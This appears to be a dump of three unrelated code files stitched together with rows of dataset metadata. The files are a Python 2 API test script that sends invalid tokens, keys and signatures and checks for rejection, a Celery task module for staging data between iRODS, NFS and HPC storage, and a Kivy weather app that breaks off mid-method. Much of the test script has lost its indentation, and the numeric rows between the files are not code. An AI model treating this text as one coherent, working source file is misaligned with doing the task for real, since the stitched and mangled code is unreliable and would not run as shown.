def testcase_6(headers, body_content, domain, key):
    """Missing access_token parameter is rejected (400 / 400.6)."""
    body_content = body_content.copy()
    body_content.pop('access_token')
    _run_get_case(6, headers.copy(), body_content, domain, key,
                  400, "400.6")


def testcase_7(headers, body_content, domain, key):
    """Invalid X-Api-Key is rejected (400 / 400.6)."""
    headers = headers.copy()
    headers['X-Api-Key'] = "INVALID_X_API_KEY"
    _run_get_case(7, headers, body_content.copy(), domain, key,
                  400, "400.6")


def testcase_8(headers, body_content, domain, key):
    """Invalid X-Signature is rejected (400 / 400.1)."""
    headers = headers.copy()
    headers['X-Signature'] = "INVALID_X_SIGNATURE"
    _run_get_case(8, headers, body_content.copy(), domain, key,
                  400, "400.1", sign=False)


def testcase_9(headers, body_content, domain, key):
    """URL-quoted junk appended to the domain is rejected (400 / 400.6)."""
    _run_get_case(9, headers.copy(), body_content.copy(),
                  quote(domain + "###@@@@"), key, 400, "400.6")
def testcase_10(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
key = quote(key+"###@@@@")
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 10 OK"
else:
print "TEST CASE 10 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_11(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
body_content['certificate_serial'] = "INVALID_CERTIFICATE_SERIAL"
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.3":
print "TEST CASE 11 OK"
else:
print "TEST CASE 11 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_12(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
body_content['access_token'] = "INVALID_ACCESS_TOKEN"
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 401 and response.json()['code'] == "401.0":
print "TEST CASE 12 OK"
else:
print "TEST CASE 12 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
if __name__ == '__main__':
# set headers
headers = dict()
headers = init_headers(headers)
# set body
body_content = dict()
init_body_content(body_content)
sso_tokens = test_1_device_auth.get_device_authentication_token()
if sso_tokens.has_key('access_token') and sso_tokens.has_key('refresh_token'):
body_content['access_token'] = sso_tokens['access_token']
else:
print "[Error] init access token failed!"
exit(-1)
domain = "TEST_DOMAIN"
key = "TEST_KEY"
testcase_0(headers, body_content, domain, key)
# testcase_1(headers, body_content, domain, key)
# testcase_2(headers, body_content, domain, key)
# testcase_3(headers, body_content, domain, key)
# testcase_4(headers, body_content, domain, key)
# testcase_5(headers, body_content, domain, key)
# testcase_6(headers, body_content, domain, key)
# testcase_7(headers, body_content, domain, key)
# testcase_8(headers, body_content, domain, key)
# testcase_9(headers, body_content, domain, key)
# testcase_10(headers, body_content, domain, key)
# testcase_11(headers, body_content, domain, key)
# testcase_12(headers, body_content, domain, key)
| 35.748756
| 121
| 0.681998
| 1,827
| 14,371
| 5.151067
| 0.048714
| 0.134417
| 0.049729
| 0.066305
| 0.912762
| 0.88099
| 0.88099
| 0.828392
| 0.824992
| 0.824992
| 0
| 0.013994
| 0.199429
| 14,371
| 401
| 122
| 35.837905
| 0.803998
| 0.15246
| 0
| 0.708772
| 0
| 0
| 0.115822
| 0.00214
| 0
| 0
| 0
| 0.002494
| 0
| 0
| null | null | 0
| 0.017544
| null | null | 0.277193
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a23212621f3f0c4144385a646cf42bb3530df1db
| 24,046
|
py
|
Python
|
staging/staging/tasks.py
|
lexis-project/ddi-service-apis
|
9e96c4159154d70613b1977a8ea28374c038b463
|
[
"Apache-2.0"
] | null | null | null |
staging/staging/tasks.py
|
lexis-project/ddi-service-apis
|
9e96c4159154d70613b1977a8ea28374c038b463
|
[
"Apache-2.0"
] | null | null | null |
staging/staging/tasks.py
|
lexis-project/ddi-service-apis
|
9e96c4159154d70613b1977a8ea28374c038b463
|
[
"Apache-2.0"
] | null | null | null |
import logging
import time
from django.urls import reverse
from staging_api.celery import app
from celery import states
from celery.exceptions import Ignore
from celery.result import AsyncResult
from celery import Celery
from . import data_size
from . import replication_api
from . import staging_api
import sys
import os
@app.task(bind=True)
def stage_class_1(self, input_data, clean_source=False, revoke_token=False):
    """Class 1 staging: transfer data from iRODS to NFS.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 1 data transfer")  # fixed typo "trasnfer"
    try:
        # class 1 staging function
        transfer = staging_api.irods_to_nfs(input_data, clean_source, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 1 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Mark the next queued task FAILED too, then cut the chain so
            # downstream tasks do not run without transfer output.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_2(self, input_data, clean_source=False, revoke_token=False):
    """Class 2 staging: transfer data from NFS to iRODS.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 2 data transfer")  # fixed typo "trasnfer"
    try:
        # class 2 staging function
        transfer = staging_api.nfs_to_irods(input_data, clean_source, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 2 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_3(self, input_data, clean_source=False, revoke_token=False):
    """Class 3 staging: transfer data from NFS to NFS.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 3 data transfer")  # fixed typo "trasnfer"
    try:
        # class 3 staging function
        transfer = staging_api.nfs_to_nfs_transfer(input_data, clean_source, revoke_token)
    except Exception as e:
        # Fixed copy/paste error: this log previously said "Class 1".
        logging.info("Handling exception in Class 3 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_4(self, input_data, revoke_token=False):
    """Class 4 staging: transfer data from iRODS to local HPC storage.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 4 data transfer")  # fixed typo "trasnfer"
    try:
        # class 4 staging function
        transfer = staging_api.irods_to_local_hpc(input_data, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 4 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_5(self, input_data, revoke_token=False):
    """Class 5 staging: transfer data from local HPC storage to iRODS.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 5 data transfer")  # fixed typo "trasnfer"
    try:
        # class 5 staging function
        transfer = staging_api.local_hpc_to_irods(input_data, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 5 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_6(self, input_data, clean_source=False, revoke_token=False):
    """Class 6 staging: transfer data from NFS to local HPC storage.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 6 data transfer")  # fixed typo "trasnfer"
    try:
        # class 6 staging function
        transfer = staging_api.nfs_to_local_hpc(input_data, clean_source, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 6 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_7(self, input_data, revoke_token=False):
    """Class 7 staging: transfer data from local HPC storage to NFS.

    Returns [task_id, transfer_result].  On failure the task and the next
    task in the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting Class 7 data transfer")  # fixed typo "trasnfer"
    try:
        # class 7 staging function
        transfer = staging_api.local_hpc_to_nfs(input_data, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 7 transfer")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def preprocess_input(self, input_data):
    """Prepare input_data for transfer into iRODS and return the result.

    On failure the task and the next task in the chain (if any) are marked
    FAILURE and the chain is cut.
    """
    logging.info("Starting preprocessing")
    try:
        # Compute once and reuse: the original called
        # staging_api.prepare_input_to_iRODS twice (stdout dump + return).
        prepared = staging_api.prepare_input_to_iRODS(input_data)
        sys.stdout.write(str(prepared))
    except Exception as e:
        logging.info("Handling exception in preprocessing")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return prepared
@app.task(bind=True)
def postprocess_input(self, transfer_output, input_data):
    """Rewrite input_data so its source points at the local iRODS copy.

    transfer_output[1] is expected to be the absolute destination path of the
    preceding transfer task; it is made relative to the iRODS base path.
    Returns the updated input_data.
    """
    logging.info("Starting postprocessing")
    try:
        input_data["source_system"] = staging_api.get_local_irods()
        base_path = staging_api.get_base_path(input_data["source_system"])
        source_path = os.path.relpath(transfer_output[1], base_path)
        input_data["source_path"] = source_path
    except Exception as e:
        # Fixed copy/paste error: this log previously said "preprocessing".
        logging.info("Handling exception in postprocessing")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return input_data
@app.task(bind=True)
def delete_class_1(self, input_data):
    """Class 1 deletion: remove the data described by input_data from iRODS."""
    logging.info("Starting Class 1 deletion")
    revoke_token = True
    try:
        staging_api.delete_irods(input_data, revoke_token)
    except Exception as exc:
        logging.info("Handling exception in Class 1 deletion")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(exc))
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id]
@app.task(bind=True)
def delete_class_2(self, input_data):
    """Class 2 deletion: remove the data described by input_data from NFS."""
    logging.info("Starting Class 2 deletion")
    revoke_token = True
    try:
        staging_api.delete_nfs(input_data, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 2 deletion")
        logging.info("Dumping input data")
        logging.info(input_data)
        # Log the exception itself, consistent with delete_class_1.
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id]
@app.task(bind=True)
def delete_class_3(self, input_data):
    """Class 3 deletion: remove the data described by input_data from HPC storage."""
    logging.info("Starting Class 3 deletion")
    revoke_token = True
    try:
        staging_api.delete_hpc(input_data, revoke_token)
    except Exception as e:
        logging.info("Handling exception in Class 3 deletion")
        logging.info("Dumping input data")
        logging.info(input_data)
        # Log the exception itself, consistent with delete_class_1.
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id]
@app.task(bind=True)
def get_data_size(self, input_data):
    """Compute the size of the data described by input_data.

    Returns [task_id, size].
    """
    logging.info("Starting the get data size task")
    try:
        size = data_size.get_data_size(input_data)
        logging.info(size)
    except Exception as exc:
        logging.info("Handling exception in data size class")
        logging.info("Dumping input data")
        logging.info(str(exc))
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id, size]
@app.task(bind=True)
def replicate(self, input_data):
    """Initiate replication of the dataset described by input_data.

    Returns [task_id, replication_result].
    """
    logging.info("Starting the replication task")
    try:
        replication = replication_api.initiate_replication(input_data)
    except Exception as e:
        logging.info("Handling exception in replication class")
        logging.info("Dumping input data")
        logging.info(str(e))
        logging.info(input_data)
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        # Consistency fix: every other task logs the state via logging;
        # this one wrote it to stdout with sys.stdout.write.
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id, replication]
@app.task(bind=True)
def assign_pid(self, input_data):
    """Initiate PID assignment for the dataset described by input_data.

    Returns [task_id, pid_result].
    """
    logging.info("Starting the PID assignment task")
    try:
        pid = replication_api.initiate_pid_assignment(input_data)
    except Exception as e:
        logging.info("Handling exception in PID assignment class")
        logging.info("Dumping input data")
        logging.info(str(e))
        logging.info(input_data)
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        # Consistency fix: every other task logs the state via logging;
        # this one wrote it to stdout with sys.stdout.write.
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id, pid]
@app.task(bind=True)
def prepare_encryption1(self, input_data):
    """Run encryption-API preparation step 1 and return its result."""
    logging.info("Starting preparation for encryption api 1")
    try:
        data = staging_api.prepare_encryption1(input_data)
    except Exception as exc:
        logging.info("Handling exception in encryption api preparation 1")
        logging.info("Dumping input data")
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        chain = self.request.chain
        if chain is not None:
            # Also fail the next queued task, then cut the chain.
            logging.info(str(chain))
            last_task = str(chain[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(task_id=last_task, state=states.FAILURE,
                              meta=failure_meta)
            self.request.chain = None
        raise Ignore()
    return data
@app.task(bind=True)
def prepare_encryption2(self, transfer_output, input_data):
    """Run encryption-API preparation step 2 and return its result."""
    logging.info("Starting preparation for encryption api 2")
    try:
        data = staging_api.prepare_encryption2(transfer_output, input_data)
    except Exception as exc:
        logging.info("Handling exception in encryption api preparation 2")
        logging.info("Dumping input data")
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        chain = self.request.chain
        if chain is not None:
            # Also fail the next queued task, then cut the chain.
            logging.info(str(chain))
            last_task = str(chain[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(task_id=last_task, state=states.FAILURE,
                              meta=failure_meta)
            self.request.chain = None
        raise Ignore()
    return data
@app.task(bind=True)
def prepare_encryption3(self, transfer_output, input_data):
    """Run encryption-API preparation step 3 and return its result."""
    logging.info("Starting preparation for encryption api 3")
    try:
        data = staging_api.prepare_encryption3(transfer_output, input_data)
    except Exception as exc:
        logging.info("Handling exception in encryption api preparation 3")
        logging.info("Dumping input data")
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        chain = self.request.chain
        if chain is not None:
            # Also fail the next queued task, then cut the chain.
            logging.info(str(chain))
            last_task = str(chain[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(task_id=last_task, state=states.FAILURE,
                              meta=failure_meta)
            self.request.chain = None
        raise Ignore()
    return data
@app.task(bind=True)
def move_nfs(self, input_data, revoke_token=False):
    """Move data within NFS storage.  Returns [task_id, transfer_result]."""
    logging.info("Starting move nfs operation")
    try:
        transfer = staging_api.move_nfs(input_data, revoke_token)
    except Exception as exc:
        logging.info("Handling exception in move nfs")
        logging.info("Dumping input data")
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        chain = self.request.chain
        if chain is not None:
            # Also fail the next queued task, then cut the chain.
            logging.info(str(chain))
            last_task = str(chain[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(task_id=last_task, state=states.FAILURE,
                              meta=failure_meta)
            self.request.chain = None
        raise Ignore()
    return [app.current_task.request.id, transfer]
@app.task(bind=True)
def prepare_encryption4(self, transfer_output, input_data):
    """Prepare input to iRODS from a previous transfer's output.

    Returns the prepared data.  On failure the task and the next task in
    the chain (if any) are marked FAILURE and the chain is cut.
    """
    logging.info("Starting prepare input to iRODS")
    try:
        # Compute once and reuse: the original called
        # staging_api.prepare_input_to_iRODS2 twice (stdout dump + return).
        prepared = staging_api.prepare_input_to_iRODS2(transfer_output, input_data)
        sys.stdout.write(str(prepared))
    except Exception as e:
        logging.info("Handling exception in preparing input to iRODS")
        logging.info("Dumping input data")
        logging.info(input_data)
        logging.info(str(e))
        self.update_state(
            state=states.FAILURE,
            meta={
                'custom': str(e),
                'exc_type': type(e).__name__,
                'exc_message': str(e)})
        logging.info(str(self.AsyncResult(self.request.id).state))
        data = self.request.chain
        if data is not None:
            # Propagate the failure to the next queued task and cut the chain.
            logging.info(str(data))
            last_task = str(data[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(
                task_id=last_task,
                state=states.FAILURE,
                meta={
                    'custom': str(e),
                    'exc_type': type(e).__name__,
                    'exc_message': str(e)})
            self.request.chain = None
        raise Ignore()
    return prepared
@app.task(bind=True)
def prepare_encryption5(self, transfer_output, input_data):
    """Run encryption-API preparation step 5 and return its result."""
    logging.info("Starting preparation for encryption api 5")
    try:
        data = staging_api.prepare_encryption5(transfer_output, input_data)
    except Exception as exc:
        logging.info("Handling exception in encryption api preparation 5")
        logging.info("Dumping input data")
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        chain = self.request.chain
        if chain is not None:
            # Also fail the next queued task, then cut the chain.
            logging.info(str(chain))
            last_task = str(chain[0]["options"]["task_id"])
            logging.info(last_task)
            self.update_state(task_id=last_task, state=states.FAILURE,
                              meta=failure_meta)
            self.request.chain = None
        raise Ignore()
    return data
@app.task(bind=True)
def duplicate(self, input_data):
    """Duplicate the dataset described by input_data.

    Returns [task_id, transfer_result].
    """
    logging.info("Starting duplication")
    try:
        # duplication function
        transfer = staging_api.duplicate(input_data)
    except Exception as exc:
        logging.info("Handling exception in duplication")
        logging.info("Dumping input data")
        logging.info(input_data)
        failure_meta = {
            'custom': str(exc),
            'exc_type': type(exc).__name__,
            'exc_message': str(exc),
        }
        self.update_state(state=states.FAILURE, meta=failure_meta)
        logging.info(str(self.AsyncResult(self.request.id).state))
        raise Ignore()
    return [app.current_task.request.id, transfer]
| 35.836066
| 90
| 0.573484
| 2,832
| 24,046
| 4.66596
| 0.041314
| 0.120705
| 0.040866
| 0.059028
| 0.909868
| 0.894506
| 0.886938
| 0.847662
| 0.823218
| 0.811185
| 0
| 0.004369
| 0.31473
| 24,046
| 670
| 91
| 35.889552
| 0.797548
| 0.008109
| 0
| 0.825243
| 0
| 0
| 0.1304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035599
| false
| 0
| 0.021036
| 0
| 0.092233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a29045b040ef64751b47142cf0c568a29fce1d6e
| 29,319
|
py
|
Python
|
Hava_Durumu/main.py
|
Canozguur/Weather-App
|
3794d73adbcb3718135185374b7686fb9f8bd1ab
|
[
"Unlicense"
] | null | null | null |
Hava_Durumu/main.py
|
Canozguur/Weather-App
|
3794d73adbcb3718135185374b7686fb9f8bd1ab
|
[
"Unlicense"
] | 1
|
2021-04-11T05:52:24.000Z
|
2021-04-11T05:52:24.000Z
|
Hava_Durumu/main.py
|
Canozguur/Weather-App
|
3794d73adbcb3718135185374b7686fb9f8bd1ab
|
[
"Unlicense"
] | null | null | null |
import requests
from bs4 import BeautifulSoup
from kivymd.app import MDApp
from kivymd.uix.screen import MDScreen
from kivymd.uix.card import MDCard
from kivy.uix.modalview import ModalView
from kivymd.uix.boxlayout import BoxLayout
from kivy.properties import StringProperty,BoundedNumericProperty,BooleanProperty
from kivy.uix.button import ButtonBehavior
from kivy.uix.image import Image
from kivy.core.window import Window
from kivymd.uix.label import Label
# Default city shown on startup; its timeanddate.com weather pages are
# scraped for the current, hourly and extended forecasts.
city = "istanbul"
url = 'https://www.timeanddate.com/weather/turkey/'+city
print(url)
hourly_url = url+"/hourly"  # hour-by-hour forecast page
daily_url = url+"/ext"      # extended (multi-day) forecast page
Window.size = (350, 625)    # fixed phone-like window size
class de(BoxLayout):
    """Content layout for a dynamically created city screen.

    Widget tree is presumably defined in the .kv file -- TODO confirm.
    """
    pass
class card_of_today(MDCard):
    """Card showing today's weather overview (fields bound in the .kv file)."""
    sunrise = StringProperty()     # sunrise time text
    sunset = StringProperty()      # sunset time text
    wind = StringProperty()        # wind speed text
    feels_like = StringProperty()  # "feels like" temperature text
    status = StringProperty()      # weather description text
class card_of_hours(MDCard):
    """Card for one hourly forecast entry."""
    hour = StringProperty()               # "HH:MM" label
    # Despite the name, new_hourly passes a weather_images/*.png path here.
    status_of_weather = StringProperty()
    temp_of_hour = StringProperty()       # temperature text
    bc_color = BooleanProperty()          # day/night background toggle
    text_color = BooleanProperty()        # day/night text-color toggle
class card_of_daily(MDCard):
    """Card for one day of the extended forecast."""
    day = StringProperty()          # English day name
    temperature = StringProperty()  # "hi/lo °C" text
    image = StringProperty()        # weather_images/*.png path
    color = BooleanProperty()       # day/night background toggle
    text_color = BooleanProperty()  # day/night text-color toggle
class search(ModalView):
    """City-search dialog; change_screen dismisses it (as self.sea) on success."""
    pass
# Turkish day-name abbreviations (as scraped from the weather pages)
# mapped to English day names.
days = {"Pzt":"Monday",
        "Sal":"Tuesday",
        "Çar":"Wednesday",
        "Per":"Thursday",
        "Cum":"Friday",
        "Cmt":"Saturday",
        "Paz":"Sunday"}
class MainScreen(MDScreen):
    """Primary screen (layout presumably defined in the .kv file)."""
    pass
class NewScreen(MDScreen):
    """Secondary screen (layout presumably defined in the .kv file)."""
    pass
class ImageButton(ButtonBehavior, Image):
    """An Image that also behaves as a clickable button."""
    pass
class MainApp(MDApp):
    def change_screen(self,text,situation):
        """Create a screen for the searched city and switch to it.

        text: city name entered by the user.
        situation: selects the country -- True -> "usa", else "turkey"
        (presumably a toggle in the search dialog; TODO confirm).
        """
        print(situation)
        if situation== True:
            self.country_of_search = "usa"
        else:
            self.country_of_search = "turkey"
        try:
            self.screen_text = 'new_city_name_of_'+text
            screen_of_new_city = MDScreen(name=f'new_city_name_of_{text}')
            self.new_screen = de()
            self.root.ids['screen_manager'].add_widget(screen_of_new_city)
            screen_of_new_city.add_widget(self.new_screen)
            city = str(text).lower()
